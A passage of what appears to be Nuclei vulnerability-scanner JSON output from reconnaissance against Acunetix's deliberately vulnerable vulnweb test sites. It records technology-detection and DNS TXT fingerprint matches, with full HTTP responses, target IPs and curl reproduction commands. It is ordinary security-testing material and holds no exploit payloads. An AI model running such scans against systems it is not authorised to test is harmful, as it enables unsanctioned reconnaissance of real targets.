title=\\\"December 02\\\"\\u003e2\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9103')\\\" style=\\\"color:Black\\\" title=\\\"December 03\\\"\\u003e3\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9104')\\\" style=\\\"color:Black\\\" title=\\\"December 04\\\"\\u003e4\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9105')\\\" style=\\\"color:Black\\\" title=\\\"December 05\\\"\\u003e5\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9106')\\\" style=\\\"color:Black\\\" title=\\\"December 06\\\"\\u003e6\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9107')\\\" style=\\\"color:Black\\\" title=\\\"December 07\\\"\\u003e7\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\r\\n\\u003c/table\\u003e\\u003cBR\\u003e\\r\\n\\u003ca href=\\\"rssFeed.aspx\\\"\\u003eGet RSS feed\\u003c/a\\u003e\\r\\n\\u003c/TD\\u003e\\r\\n\\t\\t\\t\\t\\u003c/TR\\u003e\\r\\n\\t\\t\\t\\t\\u003cTR\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003cTD colSpan=\\\"2\\\"\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003c/TD\\u003e\\r\\n\\t\\t\\t\\t\\u003c/TR\\u003e\\r\\n\\t\\t\\t\\u003c/TABLE\\u003e\\r\\n\\t\\t\\u003c/form\\u003e\\r\\n\\t\\u003c/body\\u003e\\r\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px\\\"\\u003e\\r\\n\\t\\t\\u003cp style=\\\"padding-left:5%;padding-right:5%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.\\u003c/p\\u003e\\r\\n\\t\\u003c/div\\u003e\\r\\n\\u003c/HTML\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:34:41.568590502Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.6 Safari/605.1.15' 'http://testaspnet.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"google-font-api\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/comment\",\"path\":\"/comment\",\"matched-at\":\"http://testhtml5.vulnweb.com/comment\",\"request\":\"GET /comment HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:52.0) Gecko/20100101 Firefox/52.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:34:36 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003c!--\\u003clink href=\\\"http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css\\\" rel=\\\"stylesheet\\\"\\u003e--\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eAction\\u003c/li\\u003e\\n \\u003cli class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/response\\\"\\u003eResponse\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\n Sorry, but commenting is currently disabled! \\u003c!-- invalid --\\u003e\\n \\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:41.643116566Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:52.0) Gecko/20100101 Firefox/52.0' 'http://testhtml5.vulnweb.com/comment'\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testhtml5.vulnweb.com\",\"matched-at\":\"testhtml5.vulnweb.com\",\"extracted-results\":[\"\\\"v=spf1 -all\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 58030\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 58030\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntesthtml5.vulnweb.com.\\t3593\\tIN\\tTXT\\t\\\"v=spf1 -all\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:41.709471245Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testhtml5.vulnweb.com\",\"matched-at\":\"testhtml5.vulnweb.com\",\"extracted-results\":[\"\\\"v=spf1 -all\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 12475\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 12475\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntesthtml5.vulnweb.com.\\t3594\\tIN\\tTXT\\t\\\"v=spf1 -all\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:41.709456512Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testhtml5.vulnweb.com\",\"matched-at\":\"testhtml5.vulnweb.com\",\"extracted-results\":[\"\\\"v=spf1 -all\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 12862\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 12862\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntesthtml5.vulnweb.com.\\t3594\\tIN\\tTXT\\t\\\"v=spf1 -all\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:41.767888715Z\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"angularjs\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/report\",\"path\":\"/report\",\"matched-at\":\"http://testhtml5.vulnweb.com/report\",\"request\":\"GET /report HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:122.0) Gecko/20100101 Firefox/122.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:34:36 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003c!--\\u003clink href=\\\"http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css\\\" rel=\\\"stylesheet\\\"\\u003e--\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eAction\\u003c/li\\u003e\\n \\u003cli class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/response\\\"\\u003eResponse\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\n Your report was submitted, thanks. \\u003c!-- invalid --\\u003e\\n \\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:41.83670371Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:122.0) Gecko/20100101 Firefox/122.0' 'http://testhtml5.vulnweb.com/report'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"angularjs\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/like\",\"path\":\"/like\",\"matched-at\":\"http://testhtml5.vulnweb.com/like\",\"request\":\"GET /like HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:34:36 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003c!--\\u003clink href=\\\"http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css\\\" rel=\\\"stylesheet\\\"\\u003e--\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp 